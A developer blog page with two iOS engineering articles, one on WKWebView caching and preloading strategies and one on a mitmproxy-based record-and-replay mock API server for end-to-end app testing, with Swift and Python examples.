For some reason, I have always been quite connected to “Cache”. I have previously been responsible for researching and implementing the “ iOS HLS Cache Implementation Journey “ and “ Comprehensive Guide to Implementing Local Cache Functionality in AVPlayer “ for AVPlayer; Unlike streaming caching, which aims to reduce playback traffic, this time the main task is to improve the loading speed of In-app WKWebView, which also involves research on preloading and caching in WKWebView; However, to be honest, the scenario of WKWebView is more complex. Unlike AVPlayer, which streams audio and video as one or more continuous Chunk files, only file caching is needed, WKWebView not only has its own page files but also imported resource files ( .js, .css, font, image…) which are rendered by the Browser Engine to present the page to the user. There are too many aspects in between that the App cannot control, from network to frontend page JavaScript syntax performance, rendering methods, all of which require time.
This article is only a study on the feasibility of iOS technology, and it may not be the final solution. In general, it is recommended that frontend developers start from the frontend to achieve a significant effect, please optimize the time it takes for the first content to appear on the screen (First Contentful Paint) and improve the HTTP Cache mechanism. On the one hand, it can speed up the Web/mWeb itself, affect the speed of Android/iOS in-app WebView, and also improve Google SEO ranking.
According to Apple Review Guidelines 2.5.6:
Apps that browse the web must use the appropriate WebKit framework and WebKit JavaScript. You may apply for an entitlement to use an alternative web browser engine in your app. Learn more about these entitlements.
Apps can only use the WebKit framework provided by Apple (WKWebView) and are not allowed to use third-party or modified WebKit engines. Otherwise, they will not be allowed on the App Store; starting from iOS 17.4, to comply with regulations, the EU region can use other Browser Engines after obtaining special permission from Apple.
If Apple doesn’t allow it, we can’t do it either.
[Unverified] Information suggests that even the iOS versions of Chrome and Firefox can only use Apple WebKit (WKWebView).
Another very important thing to note:
WKWebView runs on a separate thread outside the main app thread, so all requests and operations do not go through our app.
The HTTP protocol includes a Cache protocol, and the system has already implemented a Cache mechanism in all components related to the network (URLSession, WKWebView…). Therefore, the Client App does not need to implement anything, and it is not recommended for anyone to create their own Cache mechanism. Directly following the HTTP protocol is the fastest, most stable, and most effective approach.
The general operation process of HTTP Cache is as shown in the diagram above:
In addition to local cache, there may also be network caches on Network Proxy Servers or along the way.
Common HTTP Response Cache Header parameters:
1
+2
+3
+4
+5
+
expires: RFC 2822 date
+pragma: no-cache
+# Newer parameters:
+cache-control: private/public/no-store/no-cache/max-age/s-max-age/must-revalidate/proxy-revalidate...
+etag: XXX
+
Common HTTP Request Cache Header parameters:
1
+2
+
If-Modified-Since: 2024-07-18 13:00:00
+IF-None-Match: 1234
+
In iOS, network-related components (URLSession, WKWebView…) handle HTTP Request/Response Cache Headers automatically and manage caching, so we do not need to handle Cache Header parameters ourselves.
For more detailed information on how HTTP Cache works, refer to “Understanding the Progressive Understanding of HTTP Cache Mechanism by Huli”.
Returning to iOS, since we can only use Apple WebKit, we can only explore ways to achieve preloading and caching through methods provided by Apple’s WebKit.
The image above provides an overview of all Apple iOS WebKit (WKWebView) related methods introduced by ChatGPT 4o, along with brief explanations. The green section pertains to methods related to data storage.
Sharing a few interesting methods:
As introduced in the previous section on the HTTP Cache mechanism, we can ask the Web Team to enhance the HTTP Cache settings for the activity pages. On the client iOS side, we only need to check the CachePolicy setting, as everything else has been taken care of by the system!
URLSession:
1
+2
+3
+
let configuration = URLSessionConfiguration.default
+configuration.requestCachePolicy = .useProtocolCachePolicy
+let session = URLSession(configuration: configuration)
+
URLRequest/WKWebView:
1
+2
+3
+4
+
var request = URLRequest(url: url)
+request.cachePolicy = .reloadRevalidatingCacheData
+//
+wkWebView.load(request)
+
App-wide:
1
+2
+3
+4
+5
+
let memoryCapacity = 512 * 1024 * 1024 // 512 MB
+let diskCapacity = 10 * 1024 * 1024 * 1024 // 10 GB
+let urlCache = URLCache(memoryCapacity: memoryCapacity, diskCapacity: diskCapacity, diskPath: "myCache")
+
+URLCache.shared = urlCache
+
Individual URLSession:
1
+2
+3
+4
+5
+6
+
let memoryCapacity = 512 * 1024 * 1024 // 512 MB
+let diskCapacity = 10 * 1024 * 1024 * 1024 // 10 GB
+let cache = URLCache(memoryCapacity: memoryCapacity, diskCapacity: diskCapacity, diskPath: "myCache")
+
+let configuration = URLSessionConfiguration.default
+configuration.urlCache = cache
+
Additionally, as mentioned earlier, WKWebView runs on a separate thread outside the main thread of the app, so the cache of URLRequest, URLSession is not shared with WKWebView.
Check if local Cache is being used.
Enable Developer Features in Safari:
Enable isInspectable in WKWebView:
1
+2
+3
+4
+5
+
func makeWKWebView() -> WKWebView {
+ let webView = WKWebView(frame: .zero)
+ webView.isInspectable = true // is only available in ios 16.4 or newer
+ return webView
+}
+
Add webView.isInspectable = true
to WKWebView to use Safari Developer Tools in Debug Build versions.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+

+
+p.s. This is my test WKWebView project opened separately
+
+Set a breakpoint at `webView.load`.
+
+**Start Testing:**
+
+Build & Run:
+
+
+
+When the execution reaches the breakpoint at `webView.load`, click "Step Over".
+
+
+
+Go back to Safari, select "Develop" in the toolbar -> "Simulator" -> "Your Project" -> "about:blank".
+- Since the page has not started loading, the URL will be about:blank.
+- If about:blank does not appear, go back to XCode and click the "Step Over" button again until it appears.
+
+Developer tools corresponding to the page will appear:
+
+
+
+Return to XCode and click "Continue Execution":
+
+
+
+Go back to Safari, and in the developer tools, you can see the resource loading status and full developer tools functionality (components, storage space debugging, etc.).
+
+
+
+**If there is HTTP Cache for network resources, the transmitted size will display as "Disk":**
+
+
+
+
+
+You can also view cache information by clicking inside.
+
+#### Clear WKWebView Cache
+```swift
+// Clean Cookies
+HTTPCookieStorage.shared.removeCookies(since: Date.distantPast)
+
+// Clean Stored Data, Cache Data
+let dataTypes = WKWebsiteDataStore.allWebsiteDataTypes()
+let store = WKWebsiteDataStore.default()
+store.fetchDataRecords(ofTypes: dataTypes) { records in
+ records.forEach { record in
+ store.removeData(
+ ofTypes: record.dataTypes,
+ for: records,
+ completionHandler: {
+ print("clearWebViewCache() - \(record)")
+ }
+ )
+ }
+}
+
Use the above method to clear cached resources, local data, and cookie data in WKWebView.
However, improving HTTP Cache only achieves caching (faster on subsequent visits), and preloading (first visit) will not be affected. ✅
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+
class WebViewPreloader {
+ static let shared = WebViewPreloader()
+
+ private var _webview: WKWebView = WKWebView()
+
+ private init() { }
+
+ func preload(url: URL) {
+ let request = URLRequest(url: url)
+ Task { @MainActor in
+ webview.load(request)
+ }
+ }
+}
+
+WebViewPreloader.shared.preload("https://zhgchg.li/campaign/summer")
+
After improving HTTP Cache, the second time loading WKWebView will be cached. We can preload all the URLs in the list or homepage in advance to have them cached, making it faster for users when they enter.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+
+> **_After testing, it is theoretically feasible; but the performance impact and network traffic loss are too significant_** _; Users may not even go to the detailed page, but we preload all pages to feel a bit like shooting in the dark._
+
+> _Personally, I think it is not feasible in reality, and the disadvantages outweigh the benefits, cutting off one's nose to spite one's face. 😕_
+
+### Enhance HTTP Cache + WKWebView Preload Pure Resources 🎉
+
+Based on the optimization method above, we can combine the HTML Link Preload method to preload only the resource files \(e.g. \.js, \.css, font, image...\) that will be used in the page, allowing users to directly use cached resources after entering without initiating network requests to fetch resource files.
+
+> **_This means I am not preloading everything on the entire page, I am only preloading the resource files that the page will use, which may also be shared across pages; the page file \.html is still fetched from the network and combined with the preloaded files to render the page._**
+
+Please note: We are still using HTTP Cache here, so these resources must also support HTTP Cache, otherwise, future requests will still go through the network.
+
+```xml
+<!DOCTYPE html>
+<html lang="zh-tw">
+ <head>
+ <link rel="preload" href="https://cdn.zhgchg.li/dist/main.js" as="script">
+ <link rel="preload" href="https://image.zhgchg.li/v2/image/get/campaign.jpg" as="image">
+ <link rel="preload" href="https://cdn.zhgchg.li/assets/fonts/glyphicons-halflings-regular.woff2" as="font">
+ <link rel="preload" href="https://cdn.zhgchg.li/assets/fonts/Simple-Line-Icons.woff2?v=2.4.0" as="font">
+ </head>
+</html>
+
Common supported file types:
The Web Team will place the above HTML content in the path agreed upon with the App, and our WebViewPreloader
will be modified to load this path, so that WKWebView will parse <link> preload resources and generate caches while loading.
1
+2
+3
+
WebViewPreloader.shared.preload("https://zhgchg.li/campaign/summer/preload")
+// or all in one
+WebViewPreloader.shared.preload("https://zhgchg.li/assets/preload")
+
After testing, a good balance between traffic loss and preloading can be achieved . 🎉
The downside is that maintaining this cache resource list is necessary, and web optimization for page rendering and loading is still required; otherwise, the perceived time for the first page to appear will still be long.
Additionally, considering our old friend URLProtocol, all requests based on URL Loading System
(URLSession, openURL…) can be intercepted and manipulated.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+
class CustomURLProtocol: URLProtocol {
+ override class func canInit(with request: URLRequest) -> Bool {
+ // Determine if this request should be handled
+ if let url = request.url {
+ return url.scheme == "custom"
+ }
+ return false
+ }
+
+ override class func canonicalRequest(for request: URLRequest) -> URLRequest {
+ // Return the request
+ return request
+ }
+
+ override func startLoading() {
+ // Handle the request and load data
+ // Change to a caching strategy, read files locally first
+ if let url = request.url {
+ let response = URLResponse(url: url, mimeType: "text/plain", expectedContentLength: -1, textEncodingName: nil)
+ self.client?.urlProtocol(self, didReceive: response, cacheStoragePolicy: .notAllowed)
+
+ let data = "This is a custom response!".data(using: .utf8)!
+ self.client?.urlProtocol(self, didLoad: data)
+ self.client?.urlProtocolDidFinishLoading(self)
+ }
+ }
+
+ override func stopLoading() {
+ // Stop loading data
+ }
+}
+
+// AppDelegate.swift didFinishLaunchingWithOptions:
+URLProtocol.registerClass(CustomURLProtocol.self)
+
Abstract idea is to secretly send URLRequest -> URLProtocol -> download all resources by yourself in the background, user -> WKWebView -> Request -> URLProtocol -> respond with preloaded resources.
Same as mentioned earlier, WKWebView runs on a separate thread outside the main thread of the app, so URLProtocol cannot intercept requests from WKWebView.
But I heard that using dark magic seems possible, not recommended, it may lead to other issues (rejection during review).
This path is blocked ❌.
Apple introduced a new method in iOS 11, which seems to compensate for the inability of WKWebView to use URLProtocol. However, this method is similar to AVPlayer’s ResourceLoader, only system-unrecognized schemes will be handed over to our custom WKURLSchemeHandler for processing.
The abstract idea remains the same in the background, where WKWebView secretly sends Request -> WKURLSchemeHandler -> download all resources by yourself, user -> WKWebView -> Request -> WKURLSchemeHandler -> respond with preloaded resources.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+
import WebKit
+
+class CustomSchemeHandler: NSObject, WKURLSchemeHandler {
+ func webView(_ webView: WKWebView, start urlSchemeTask: WKURLSchemeTask) {
+ // Custom handling
+ let url = urlSchemeTask.request.url!
+
+ if url.scheme == "custom-scheme" {
+ // Change to caching strategy, read file locally first
+ let response = URLResponse(url: url, mimeType: "text/html", expectedContentLength: -1, textEncodingName: nil)
+ urlSchemeTask.didReceive(response)
+
+ let html = "<html><body><h1>Hello from custom scheme!</h1></body></html>"
+ let data = html.data(using: .utf8)!
+ urlSchemeTask.didReceive(data)
+ urlSchemeTask.didFinish()
+ }
+ }
+
+ func webView(_ webView: WKWebView, stop urlSchemeTask: WKURLSchemeTask) {
+ // Stop
+ }
+}
+
+let webViewConfiguration = WKWebViewConfiguration()
+webViewConfiguration.setURLSchemeHandler(CustomSchemeHandler(), forURLScheme: "mycacher")
+
+let customURL = URL(string: "mycacher://zhgchg.li/campaign/summer")!
+webView.load(URLRequest(url: customURL))
+
mycacher://
).mycacher://
for our Handler to capture.Overall, while theoretically feasible, the implementation requires a huge investment; it is not cost-effective and difficult to scale and maintain stability 😕
Feeling that the WKURLSchemeHandler method is more suitable for handling web pages with large resource files that need to be downloaded, declaring a custom scheme to be processed by the app to render the web page cooperatively.
Change WKWebView to use the interface defined by the app (WkUserScript) instead of Ajax, XMLHttpRequest, Fetch, for the app to request resources.
This example is not very helpful because the first screen appears too slow, not the subsequent loading; and this method will cause a deep and strange dependency relationship between Web and App 🫥
Due to security issues, only Apple’s own Safari app supports it, WKWebView does not support it❌.
Optimize to improve the performance of loading views in WKWebView.
WKWebView itself is like a skeleton, and the web page is the flesh. After researching, optimizing the skeleton (e.g. reusing WKProcessPool) has limited effect, possibly a difference of 0.0003 -> 0.000015 seconds.
Similar to the Preload method, but instead of putting the active page in the App Bundle or fetching it remotely at startup.
Putting the entire HTML page may also encounter CORS same-origin issues; it feels like using the “Improve HTTP Cache + WKWebView Preload pure resources” method instead; putting it in the App Bundle only increases the App Size, fetching it remotely is WKWebView Preload 🫥
Reference wedevs optimization suggestions, the frontend HTML page is expected to have four loading stages, from loading the page file (.html) at the beginning to First Paint (blank page), then to First Contentful Paint (rendering the page skeleton), then to First Meaningful Paint (adding page content), and finally to Time To Interactive (allowing user interaction).
Using our page for testing; browsers, WKWebView will first request the page body .html and then load the required resources, while building the screen for the user according to the program instructions. Comparing with the article, it is found that the page stages only go from First Paint (blank) to Time To Interactive (First Contentful Paint only has the Navigation Bar, which should not count much…), missing the intermediate stages of rendering for the user, thus extending the overall waiting time for the user.
And currently, only resource files have HTTP Cache settings, not the page body.
Additionally, you can refer to Google PageSpeed Insights for optimization suggestions, such as compression, reducing script size, etc.
Because the core of in-app WKWebView is still the web page itself; therefore, adjusting from the frontend web page is a very effective way to make a big difference with a small adjustment. 🎉🎉🎉
A simple implementation, starting from the user experience, adding a Loading Progress Bar, not just showing a blank page to confuse the user, let them know that the page is loading and where the progress is.🎉🎉🎉
The above is some ideation research on feasible solutions for WKWebView preloading and caching. The technology is not the biggest issue, the key is still the choice, which ways are most effective for users with the lowest development cost. Choosing these ways may achieve the goal directly with minor changes; choosing the wrong way will result in a huge investment of resources and may be difficult to maintain and use in the future.
There are always more solutions than difficulties, sometimes it’s just a lack of imagination.
Maybe there are some legendary combinations that I haven’t thought of, welcome everyone to contribute.
The author also mentioned the method of WKURLSchemeHandler.
The complete Demo Repo in the video is as follows:
The sharing about WkWebView in the Old Driver Weekly is also worth a look.
Long-awaited return to writing long articles related to iOS development.
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Verification of the feasibility of implementing E2E Testing for existing apps and existing API architecture
Photo by freestocks
As a project that has been operating online for many years, continuously improving stability is a highly challenging issue.
Due to the static + compiled + strongly typed nature of the development languages Swift/Kotlin or the dynamic to static transition from Objective-C to Swift, it is almost impossible to add Unit Testing later if testability was not considered during development to cleanly separate interface dependencies. However, the refactoring process can also introduce instability, leading to a chicken-and-egg problem.
Testing UI interactions and buttons; it can be implemented by slightly decoupling data dependencies in new or existing screens.
Verifying whether the UI display content and style are consistent before and after adjustments; similar to UI Testing, it can be implemented by slightly decoupling data dependencies in new or existing screens.
It is very useful for transitioning from Storyboard/XIB to Code Layout or UIView from OC to Swift; you can directly import pointfreeco / swift-snapshot-testing for quick implementation.
Although we can add UI Testing and SnapShot Testing later, the coverage of these tests is very limited; most errors are not UI style issues but process or logic problems that interrupt user operations. If this occurs during the checkout process, involving revenue, the issue becomes very serious.
As mentioned earlier, it is not feasible to easily add unit tests to the current project or to integrate units for integration testing. For logic and process protection, the remaining method is to perform End-to-End black-box testing from the outside, directly from the user’s perspective, to check whether important processes (registration/checkout, etc.) are functioning normally.
For major function refactoring, you can also establish process tests before refactoring and re-verify after refactoring to ensure that the functionality works as expected.
Refactoring along with adding Unit Testing and Integration Testing to increase stability, breaking the chicken-and-egg problem.
The most direct and brute-force way of End-to-End Testing is to have a QA Team manually test according to the Test Plan, and then continuously optimize or introduce automated operations. Calculating the cost, it would require at least 2 engineers + 1 Leader spending at least half a year to a year to see results.
Evaluating the time and cost, is there anything we can do in the current situation or prepare for the future QA Team so that when there is a QA Team, we can directly jump to optimization and automation operations, or even introduce AI?
At this stage, the goal is to introduce automated End-to-End Testing, placed in the CI/CD process for automatic checks. The test content does not need to be too comprehensive; as long as it can prevent major process issues, it is already very valuable. Later, we can gradually iterate the Test Plan to cover more areas.
The principle of the App is more like using another test App to operate our tested App, and then finding the target object from the View Hierarchy. During testing, we cannot obtain the Log or Output of the tested App because they are essentially two different Apps.
iOS needs to improve the View Accessibility Identifier to increase efficiency and accuracy and handle Alerts (e.g., push notification requests).
In previous implementations on Android, there was an issue where the target object could not be found when mixing Compose and Fragment, but according to a teammate, the new version of Compose has resolved this.
Besides the common traditional issues mentioned above, a bigger problem is the difficulty of integrating dual platforms (writing one test to run on two platforms). Currently, we are trying to use a new testing tool mobile-dev-inc / maestro:
You can write a Test Plan in YAML and then execute tests on dual platforms. For detailed usage and trial experiences, stay tuned for another teammate’s article sharing cc’ed Alejandra Ts. 😝.
The biggest testing variable for App E2E Testing is API data. If we cannot provide guaranteed data, it will increase the instability of the tests, leading to false positives, and eventually, everyone will lose confidence in the Test Plan.
For example, in testing the checkout process, if the product might be taken off the shelf or disappear, and these status changes are not controllable by the App, the above situation is very likely to occur.
There are many ways to solve data issues, such as establishing a clean Staging or Testing environment, or an Auto-Gen Mock API Server based on Open API. However, these all rely on the backend and external factors of the API. Additionally, the backend API, like the App, is an online project that has been running for many years, and some specifications are still being restructured and migrated, making it temporarily impossible to have a Mock Server.
Given these factors, if we get stuck here, the problem will remain unchanged, and the chicken-and-egg problem cannot be broken. We really can only “take the risk” and make changes first, dealing with issues as they arise.
“As long as the mindset doesn’t slip, there are more solutions than difficulties.”
We can think differently. If the UI can be snapshotted into images for replay verification testing, can the API do the same? Can we save the API Request & Response and replay them for verification testing later?
This introduces the main point of this article: establishing a “Snapshot API Local Mock Server” to record API Requests & Replay Responses, removing the dependency on API data.
This article only provides a Proof of Concept (POC) and has not yet fully implemented high-coverage End-to-End Testing. Therefore, the approach is for reference only. I hope it provides new insights for everyone in the current environment.
[Record] — After completing the development of the End-to-End Testing Test Case, enable the recording parameter and execute the test once. During this process, all API Requests & Responses will be saved in the respective Test Case directories.
[Replay] — When running the Test Case later, the corresponding recorded Response Data will be found from the Test Case directory according to the request to complete the testing process.
Suppose we want to test the purchase process. The user opens the App, clicks on the product card on the homepage to enter the product detail page, clicks the purchase button at the bottom, a login box pops up to complete the login, completes the purchase, and a purchase success prompt pops up:
How UI Testing controls button clicks, input box inputs, etc., is not the main focus of this article; you can refer to existing testing frameworks for direct use.
To achieve Record & Replay API, a Proxy needs to be added between the App and the API to perform a man-in-the-middle attack. You can refer to my earlier article “The APP uses HTTPS transmission, but the data is still stolen.”
In simple terms, there is an additional proxy transmitter between the App and the API, like passing notes. The requests and responses exchanged between both parties will go through it. It can open the content of the notes and can also forge the content of the notes for both parties without them noticing.
Regular Proxy:
A regular proxy is when the client sends a request to the proxy server, the proxy server forwards the request to the target server, and then returns the response from the target server to the client. In a regular proxy mode, the proxy server initiates the request on behalf of the client. The client needs to explicitly specify the address and port number of the proxy server and send the request to the proxy server.
Reverse Proxy:
A reverse proxy is the opposite of a regular proxy. It sits between the target server and the client. The client sends a request to the reverse proxy server, which forwards the request to the backend target server according to certain rules and returns the response from the target server to the client. For the client, the target server appears to be the reverse proxy server, and the client does not need to know the real address of the target server.
For our needs, either regular or reverse proxy can achieve the goal. The only consideration is the method of proxy setup:
Regular Proxy requires setting up a Proxy in the network settings on the computer, phone, or emulator:
Reverse Proxy requires changing the API Host in the Codebase and declaring all API Domains to be proxied:
For iOS App, the following example uses iOS & Reverse Proxy for POC. The same can be applied to Android.
We need to let the App know it’s running End-to-End Testing to add the API Host replacement logic in the App program:
1
+2
+3
+4
+
// UI Testing Target:
+let app = XCUIApplication()
+app.launchArguments = ["duringE2ETesting"]
+app.launch()
+
We make the judgment and replacement in the Network layer.
This is an unavoidable adjustment. Try to avoid changing the App’s Code just for testing.
You can also use Swift to develop a Swift Server to achieve this. This article uses the MITMProxy tool for POC.
The implementation content below has been open-sourced to the mitmproxy-rodo project. Feel free to refer to and use it directly.
Some structures and content of this article have been adjusted, and the following adjustments were made when open-sourced:
host / requestPath / method / hash
⚠️ The following script is for Demo reference only, subsequent script adjustments will be moved to the open-source project maintenance.
Follow the MITMProxy official website to complete the installation:
1
+
brew install mitmproxy
+
For detailed usage of MITMProxy, you can refer to my earlier article “The APP uses HTTPS transmission, but the data is still stolen.”
mitmproxy
provides an interactive command-line interface.mitmweb
provides a browser-based graphical user interface.mitmdump
provides non-interactive terminal output.Since MITMProxy Reverse Proxy does not natively have the functionality to Record (or dump) requests & Mapping Request Replay, we need to write scripts to achieve this functionality.
mock.py
:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+127
+128
+129
+130
+131
+132
+133
+134
+135
+136
+137
+138
+139
+140
+141
+142
+143
+144
+145
+146
+147
+148
+149
+150
+151
+152
+153
+154
+155
+156
+157
+158
+159
+160
+161
+162
+163
+164
+165
+166
+167
+168
+169
+170
+171
+172
+173
+174
+175
+176
+177
+178
+179
+180
+181
+182
+183
+184
+185
+186
+187
+188
+189
+190
+191
+192
+193
+194
+195
+196
+197
+198
+199
+200
+201
+202
+203
+204
+205
+206
+207
+208
+209
+210
+
"""
+Example:
+ Record: mitmdump -m reverse:https://yourapihost.com -s mock.py --set record=true --set dumper_folder=loginFlow --set config_file=config.json
+ Replay: mitmdump -m reverse:https://yourapihost.com -s mock.py --set dumper_folder=loginFlow --set config_file=config.json
+"""
+
+import re
+import logging
+import mimetypes
+import os
+import json
+import hashlib
+
+from pathlib import Path
+from mitmproxy import ctx
+from mitmproxy import http
+
+class MockServerHandler:
+
+ def load(self, loader):
+ self.readHistory = {}
+ self.configuration = {}
+
+ loader.add_option(
+ name="dumper_folder",
+ typespec=str,
+ default="dump",
+ help="Response Dump directory, can be created by Test Case Name",
+ )
+
+ loader.add_option(
+ name="network_restricted",
+ typespec=bool,
+ default=True,
+ help="No Mapping data locally... setting true will return 404, false will make a real request to get data.",
+ )
+
+ loader.add_option(
+ name="record",
+ typespec=bool,
+ default=False,
+ help="Set true to record Request's Response",
+ )
+
+ loader.add_option(
+ name="config_file",
+ typespec=str,
+ default="",
+ help="Set file path, example file below",
+ )
+
+ def configure(self, updated):
+ self.loadConfig()
+
+ def loadConfig(self):
+ configFile = Path(ctx.options.config_file)
+ if ctx.options.config_file == "" or not configFile.exists():
+ return
+
+ self.configuration = json.loads(open(configFile, "r").read())
+
+ def hash(self, request):
+ query = request.query
+ requestPath = "-".join(request.path_components)
+
+ ignoredQueryParameterByPaths = self.configuration.get("ignored", {}).get("paths", {}).get(request.host, {}).get(requestPath, {}).get(request.method, {}).get("queryParamters", [])
+ ignoredQueryParameterGlobal = self.configuration.get("ignored", {}).get("global", {}).get("queryParamters", [])
+
+ filteredQuery = []
+ if query:
+ filteredQuery = [(key, value) for key, value in query.items() if key not in ignoredQueryParameterByPaths + ignoredQueryParameterGlobal]
+
+ formData = []
+ if request.get_content() != None and request.get_content() != b'':
+ formData = json.loads(request.get_content())
+
+ # or just formData = request.urlencoded_form
+ # or just formData = request.multipart_form
+ # depends on your api design
+
+ ignoredFormDataParametersByPaths = self.configuration.get("ignored", {}).get("paths", {}).get(request.host, {}).get(requestPath, {}).get(request.method, {}).get("formDataParameters", [])
+ ignoredFormDataParametersGlobal = self.configuration.get("ignored", {}).get("global", {}).get("formDataParameters", [])
+
+ filteredFormData = []
+ if formData:
+ filteredFormData = [(key, value) for key, value in formData.items() if key not in ignoredFormDataParametersByPaths + ignoredFormDataParametersGlobal]
+
+ # Serialize the dictionary to a JSON string
+ hashData = {"query":sorted(filteredQuery), "form": sorted(filteredFormData)}
+ json_str = json.dumps(hashData, sort_keys=True)
+
+ # Apply SHA-256 hash function
+ hash_object = hashlib.sha256(json_str.encode())
+ hash_string = hash_object.hexdigest()
+
+ return hash_string
+
+ def readFromFile(self, request):
+ host = request.host
+ method = request.method
+ hash = self.hash(request)
+ requestPath = "-".join(request.path_components)
+
+ folder = Path(ctx.options.dumper_folder) / host / method / requestPath / hash
+
+ if not folder.exists():
+ return None
+
+ content_type = request.headers.get("content-type", "").split(";")[0]
+ ext = mimetypes.guess_extension(content_type) or ".json"
+
+
+ count = self.readHistory.get(host, {}).get(method, {}).get(requestPath, {}) or 0
+
+ filepath = folder / f"Content-{str(count)}{ext}"
+
+ while not filepath.exists() and count > 0:
+ count = count - 1
+ filepath = folder / f"Content-{str(count)}{ext}"
+
+ if self.readHistory.get(host) is None:
+ self.readHistory[host] = {}
+ if self.readHistory.get(host).get(method) is None:
+ self.readHistory[host][method] = {}
+ if self.readHistory.get(host).get(method).get(requestPath) is None:
+ self.readHistory[host][method][requestPath] = {}
+
+ if filepath.exists():
+ headerFilePath = folder / f"Header-{str(count)}.json"
+ if not headerFilePath.exists():
+ headerFilePath = None
+
+ count += 1
+ self.readHistory[host][method][requestPath] = count
+
+ return {"content": filepath, "header": headerFilePath}
+ else:
+ return None
+
+
+ def saveToFile(self, request, response):
+ host = request.host
+ method = request.method
+ hash = self.hash(request)
+ requestPath = "-".join(request.path_components)
+
+ iterable = self.configuration.get("ignored", {}).get("paths", {}).get(request.host, {}).get(requestPath, {}).get(request.method, {}).get("iterable", False)
+
+ folder = Path(ctx.options.dumper_folder) / host / method / requestPath / hash
+
+ # create dir if not exists
+ if not folder.exists():
+ os.makedirs(folder)
+
+ content_type = response.headers.get("content-type", "").split(";")[0]
+ ext = mimetypes.guess_extension(content_type) or ".json"
+
+ repeatNumber = 0
+ filepath = folder / f"Content-{str(repeatNumber)}{ext}"
+ while filepath.exists() and iterable == False:
+ repeatNumber += 1
+ filepath = folder / f"Content-{str(repeatNumber)}{ext}"
+
+ # dump to file
+ with open(filepath, "wb") as f:
+ f.write(response.content or b'')
+
+
+ headerFilepath = folder / f"Header-{str(repeatNumber)}.json"
+ with open(headerFilepath, "wb") as f:
+ responseDict = dict(response.headers.items())
+ responseDict['_status_code'] = response.status_code
+ f.write(json.dumps(responseDict).encode('utf-8'))
+
+ return {"content": filepath, "header": headerFilepath}
+
+ def request(self, flow):
+ if ctx.options.record != True:
+ host = flow.request.host
+ path = flow.request.path
+
+ result = self.readFromFile(flow.request)
+ if result is not None:
+ content = b''
+ headers = {}
+ statusCode = 200
+
+ if result.get('content') is not None:
+ content = open(result['content'], "r").read()
+
+ if result.get('header') is not None:
+ headers = json.loads(open(result['header'], "r").read())
+ statusCode = headers['_status_code']
+ del headers['_status_code']
+
+
+ headers['_responseFromMitmproxy'] = '1'
+ flow.response = http.Response.make(statusCode, content, headers)
+ logging.info("Fullfill response from local with "+str(result['content']))
+ return
+
+ if ctx.options.network_restricted == True:
+ flow.response = http.Response.make(404, b'', {'_responseFromMitmproxy': '1'})
+
+ def response(self, flow):
+ if ctx.options.record == True and flow.response.headers.get('_responseFromMitmproxy') != '1':
+ result = self.saveToFile(flow.request, flow.response)
+ logging.info("Save response to local with "+str(result['content']))
+
+addons = [MockServerHandler()]
+
You can refer to the official documentation and adjust the script content as needed.
The design logic of this script is as follows:
dumper_folder(a.k.a Test Case Name)
/ Reverse's api host
/ HTTP Method
/ Path join with -
(e.g. app/launch
-> app-launch
) / Hash(Get Query & Post Content)
/Content-0.xxx
, Content-1.xxx
(the second request of the same request) … and so on; Response Header information: Header-0.json
(same Content-x
logic)record
is True
, it will hit the target Server to get the response and save it according to the above logic; when False
, it will only read data locally (equivalent to Replay Mode).network_restricted
is False
, if there is no Mapping data locally, it will directly respond with 404
; when True
, it will hit the target Server to get the data._responseFromMitmproxy
is used to inform the Response Method that the current response is from Local and can be ignored, _status_code
borrows the Header.json field to store the HTTP Response status code.config_file.json
configuration file logic design is as follows:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+
{
+ "ignored": {
+ "paths": {
+ "yourapihost.com": {
+ "add-to-cart": {
+ "POST": {
+ "queryParamters": [
+ "created_timestamp"
+ ],
+ "formDataParameters": []
+ }
+ },
+ "api-status-checker": {
+ "GET": {
+ "iterable": true
+ }
+ }
+ }
+ },
+ "global": {
+ "queryParamters": [
+ "timestamp"
+ ],
+ "formDataParameters": []
+ }
+ }
+}
+
queryParamters
& formDataParameters
:
Because some API parameters may change with each call, for example, some Endpoints will carry time parameters, at this time according to the Server’s design, the Hash(Query Parameter & Body Content)
value will be different during Replay Request, resulting in no Mapping to Local Response. Therefore, an additional config.json
is used to handle this situation. You can set certain parameters to be excluded from the Hash by Endpoint Path or Global, so you can get the same Mapping result.
iterable
:
Because some polling check APIs may be called repeatedly at regular intervals, according to the Server’s design, many Content-x.xxx
& Header-x.json
files will be generated; but if we don’t care, we can set it to True
, and the Response will continue to be saved and overwritten to the first file Content-0.xxx
& Header-0.json
.
Enable Reverse Proxy Record Mode:
1
+
